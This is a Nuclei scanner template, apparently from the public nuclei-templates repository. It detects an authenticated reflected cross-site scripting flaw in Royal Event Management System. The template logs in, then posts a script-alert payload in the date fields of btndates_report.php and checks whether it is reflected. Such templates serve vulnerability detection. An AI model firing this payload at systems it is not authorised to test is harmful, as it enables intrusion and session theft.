nuclei-templates/http/vulnerabilities/royalevent/royalevent-management-xss.yaml

80 lines
2.7 KiB
YAML
Raw Normal View History

2022-06-23 07:08:09 +00:00
id: royalevent-management-xss
info:
name: Royal Event Management System - Cross-Site Scripting
2022-06-23 07:08:09 +00:00
author: ritikchaddha
severity: high
2022-06-23 07:08:09 +00:00
description: |
Royal Event Management System contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-06-23 07:08:09 +00:00
reference:
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
2022-06-23 18:35:48 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
tags: cms,royalevent,packetstorm,xss,authenticated,intrusive
2022-06-23 07:08:09 +00:00
http:
2022-06-23 07:08:09 +00:00
- raw:
- |
POST /royal_event/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="todate"
2022-12-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="fromdate"
2022-06-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
cookie-reuse: true
2023-10-14 11:27:55 +00:00
2022-06-23 07:08:09 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
2022-06-23 18:35:48 +00:00
- "Report from "
condition: and
- type: word
part: header
words:
- text/html
2022-06-23 07:08:09 +00:00
- type: status
status:
- 200
# digest: 4b0a004830460221008c2e6f478364f97713eca2117fd1ac9375754f3811b2d613fa0dc71ea6a1da56022100955685d6a2829c3755203356ad56690dbc3c4c38d0d41b7df5b1b8f95794f07b:922c64590222798bb761d5b6d8e72950